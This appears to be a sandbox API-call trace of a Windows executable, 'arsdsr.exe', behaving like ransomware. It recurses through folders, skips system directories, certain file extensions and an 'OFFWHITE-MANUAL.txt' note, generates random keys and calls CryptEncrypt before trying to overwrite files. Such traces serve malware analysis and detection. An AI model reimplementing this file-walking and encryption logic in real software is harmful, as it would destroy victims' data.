[0144.047] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55d230*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55d230*, pdwDataLen=0x295cf90*=0x100) returned 1 [0144.048] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.048] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.048] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55d338*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55d338*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0144.048] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d244, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0144.048] SetLastError (dwErrCode=0x0) [0144.048] WriteFile (in: hFile=0xffffffff, lpBuffer=0x55d230, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0) returned 0 [0144.048] GetLastError () returned 0x6 [0144.048] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3011a9e, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd3011a9e, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x9c0d5455, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x70c1, dwReserved0=0x6a0068, dwReserved1=0x295dcf0, cFileName="watermark.png", cAlternateFileName="")) returned 0 [0144.048] FindClose (in: hFindFile=0x544750 | out: hFindFile=0x544750) returned 1 [0144.057] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c005a, dwReserved1=0x295e370, cFileName="{8702d817-5aad-4674-9ef3-4d3decd87120}", cAlternateFileName="{8702D~1")) returned 0 [0144.057] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0144.057] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd98f9f8, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="Task", cAlternateFileName="")) returned 1 [0144.057] lstrcmpiW (lpString1="Task", lpString2=".") returned 1 [0144.057] lstrcmpiW (lpString1="Task", lpString2="..") returned 1 [0144.057] lstrcmpiW (lpString1="Task", lpString2="...") returned 1 [0144.057] lstrcmpiW (lpString1="Task", lpString2="windows") returned -1 [0144.057] lstrcmpiW (lpString1="Task", lpString2="$recycle.bin") returned 1 [0144.057] lstrcmpiW (lpString1="Task", lpString2="rsa") returned 1 [0144.057] lstrcmpiW (lpString1="Task", lpString2="ntuser.dat") returned 1 [0144.057] lstrcmpiW (lpString1="Task", lpString2="programdata") returned 1 [0144.057] lstrcmpiW (lpString1="Task", lpString2="appdata") returned 1 [0144.057] lstrcmpiW (lpString1="Task", lpString2="program files") returned 1 [0144.057] lstrcmpiW (lpString1="Task", lpString2="program files (x86)") returned 1 [0144.057] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Microsoft\\Device Stage\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\" [0144.057] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\", lpString2="Task" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task" [0144.057] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\" [0144.057] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\" [0144.057] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\*.*") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\*.*" [0144.057] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd98f9f8, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c005a, dwReserved1=0x295e370, cFileName=".", cAlternateFileName="")) returned 0x544590 [0144.058] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0144.058] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd98f9f8, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c005a, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 1 [0144.058] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0144.058] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0144.058] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c005a, dwReserved1=0x295e370, cFileName="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", cAlternateFileName="{07DEB~1")) returned 1 [0144.058] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2=".") returned 1 [0144.058] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="..") returned 1 [0144.058] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="...") returned 1 [0144.058] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="windows") returned -1 [0144.058] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="$recycle.bin") returned 1 [0144.058] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="rsa") returned -1 [0144.058] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="ntuser.dat") returned -1 [0144.058] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="programdata") returned -1 [0144.058] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="appdata") returned -1 [0144.058] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="program files") returned -1 [0144.058] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="program files (x86)") returned -1 [0144.059] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\" [0144.059] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\", lpString2="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}" [0144.059] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\" [0144.059] lstrcpyW (in: lpString1=0x295d670, lpString2="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\" [0144.059] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*" [0144.059] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName=".", cAlternateFileName="")) returned 0x544750 [0144.063] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0144.063] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="..", cAlternateFileName="")) returned 1 [0144.063] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0144.063] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0144.063] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22f23962, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="en-US", cAlternateFileName="")) returned 1 [0144.064] lstrcmpiW (lpString1="en-US", lpString2=".") returned 1 [0144.064] lstrcmpiW (lpString1="en-US", lpString2="..") returned 1 [0144.065] lstrcmpiW (lpString1="en-US", lpString2="...") returned 1 [0144.065] lstrcmpiW (lpString1="en-US", lpString2="windows") returned -1 [0144.065] lstrcmpiW (lpString1="en-US", lpString2="$recycle.bin") returned 1 [0144.065] lstrcmpiW (lpString1="en-US", lpString2="rsa") returned -1 [0144.065] lstrcmpiW (lpString1="en-US", lpString2="ntuser.dat") returned -1 [0144.065] lstrcmpiW (lpString1="en-US", lpString2="programdata") returned -1 [0144.065] lstrcmpiW (lpString1="en-US", lpString2="appdata") returned 1 [0144.065] lstrcmpiW (lpString1="en-US", lpString2="program files") returned -1 [0144.065] lstrcmpiW (lpString1="en-US", lpString2="program files (x86)") returned -1 [0144.065] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\" [0144.065] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", lpString2="en-US" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US" [0144.065] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\" [0144.066] lstrcpyW (in: lpString1=0x295cff0, lpString2="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\" [0144.066] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*.*") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*.*" [0144.066] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*.*", lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22f23962, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb400b2, dwReserved1=0x295d670, cFileName=".", cAlternateFileName="")) returned 0x544790 [0144.066] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0144.066] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22f23962, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb400b2, dwReserved1=0x295d670, cFileName="..", cAlternateFileName="")) returned 1 [0144.066] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0144.066] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0144.066] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x932b6af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x95b44f8, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x932b6af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x536, dwReserved0=0xb400b2, dwReserved1=0x295d670, cFileName="resource.xml", cAlternateFileName="")) returned 1 [0144.066] lstrcmpiW (lpString1="resource.xml", lpString2=".") returned 1 [0144.066] lstrcmpiW (lpString1="resource.xml", lpString2="..") returned 1 [0144.066] lstrcmpiW (lpString1="resource.xml", lpString2="...") returned 1 [0144.066] lstrcmpiW (lpString1="resource.xml", lpString2="windows") returned -1 [0144.066] lstrcmpiW (lpString1="resource.xml", lpString2="$recycle.bin") returned 1 [0144.066] lstrcmpiW (lpString1="resource.xml", lpString2="rsa") returned -1 [0144.066] lstrcmpiW (lpString1="resource.xml", lpString2="ntuser.dat") returned 1 [0144.066] lstrcmpiW (lpString1="resource.xml", lpString2="programdata") returned 1 [0144.066] lstrcmpiW (lpString1="resource.xml", lpString2="appdata") returned 1 [0144.066] lstrcmpiW (lpString1="resource.xml", lpString2="program files") returned 1 [0144.067] lstrcmpiW (lpString1="resource.xml", lpString2="program files (x86)") returned 1 [0144.067] lstrcpyW (in: lpString1=0x295cde8, lpString2="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\" [0144.067] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\", lpString2="resource.xml" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml" [0144.067] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.067] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.067] PathFindExtensionW (pszPath="resource.xml") returned=".xml" [0144.067] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0144.067] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0144.067] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0144.067] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0144.067] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0144.067] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0144.067] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0144.067] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0144.067] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0144.067] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0144.067] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0144.067] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0144.067] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0144.067] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0144.067] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0144.067] lstrcmpiW (lpString1="resource.xml", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0144.067] GetProcessHeap () returned 0x500000 [0144.067] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52e840 [0144.068] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0144.074] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295cb60 | out: lpFileSize=0x295cb60*=-4251595836) returned 0 [0144.074] GetProcessHeap () returned 0x500000 [0144.074] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531608 [0144.074] GetProcessHeap () returned 0x500000 [0144.074] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531620 [0144.074] GetProcessHeap () returned 0x500000 [0144.074] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55d440 [0144.074] GetProcessHeap () returned 0x500000 [0144.074] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55d548 [0144.074] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.074] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.074] SystemFunction036 (in: RandomBuffer=0x531608, RandomBufferLength=0x10 | out: RandomBuffer=0x531608) returned 1 [0144.074] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.074] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.074] SystemFunction036 (in: RandomBuffer=0x531620, RandomBufferLength=0x10 | out: RandomBuffer=0x531620) returned 1 [0144.074] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.074] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.074] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55d440*, pdwDataLen=0x295c910*=0x10, dwBufLen=0x100 | out: pbData=0x55d440*, pdwDataLen=0x295c910*=0x100) returned 1 [0144.075] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.075] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.075] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55d548*, pdwDataLen=0x295c90c*=0x10, dwBufLen=0x100 | out: pbData=0x55d548*, pdwDataLen=0x295c90c*=0x100) returned 1 [0144.075] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295cbc4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0144.075] SetLastError (dwErrCode=0x0) [0144.075] WriteFile (in: hFile=0xffffffff, lpBuffer=0x55d440, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0) returned 0 [0144.075] GetLastError () returned 0x6 [0144.075] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x932b6af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x95b44f8, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x932b6af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x536, dwReserved0=0xb400b2, dwReserved1=0x295d670, cFileName="resource.xml", cAlternateFileName="")) returned 0 [0144.075] FindClose (in: hFindFile=0x544790 | out: hFindFile=0x544790) returned 1 [0144.075] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2c7f9e6, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2c7f9e6, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x7c0e93d7, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xd0a3, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0144.075] lstrcmpiW (lpString1="folder.ico", lpString2=".") returned 1 [0144.075] lstrcmpiW (lpString1="folder.ico", lpString2="..") returned 1 [0144.075] lstrcmpiW (lpString1="folder.ico", lpString2="...") returned 1 [0144.076] lstrcmpiW (lpString1="folder.ico", lpString2="windows") returned -1 [0144.076] lstrcmpiW (lpString1="folder.ico", lpString2="$recycle.bin") returned 1 [0144.076] lstrcmpiW (lpString1="folder.ico", lpString2="rsa") returned -1 [0144.076] lstrcmpiW (lpString1="folder.ico", lpString2="ntuser.dat") returned -1 [0144.076] lstrcmpiW (lpString1="folder.ico", lpString2="programdata") returned -1 [0144.076] lstrcmpiW (lpString1="folder.ico", lpString2="appdata") returned 1 [0144.076] lstrcmpiW (lpString1="folder.ico", lpString2="program files") returned -1 [0144.076] lstrcmpiW (lpString1="folder.ico", lpString2="program files (x86)") returned -1 [0144.076] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\" [0144.076] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", lpString2="folder.ico" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico" [0144.076] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.076] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.076] PathFindExtensionW (pszPath="folder.ico") returned=".ico" [0144.076] lstrcmpiW (lpString1=".ico", lpString2=".exe") returned 1 [0144.076] lstrcmpiW (lpString1=".ico", lpString2=".log") returned -1 [0144.076] lstrcmpiW (lpString1=".ico", lpString2=".cab") returned 1 [0144.076] lstrcmpiW (lpString1=".ico", lpString2=".cmd") returned 1 [0144.076] lstrcmpiW (lpString1=".ico", lpString2=".com") returned 1 [0144.076] lstrcmpiW (lpString1=".ico", lpString2=".cpl") returned 1 [0144.076] lstrcmpiW (lpString1=".ico", lpString2=".ini") returned -1 [0144.076] lstrcmpiW (lpString1=".ico", lpString2=".dll") returned 1 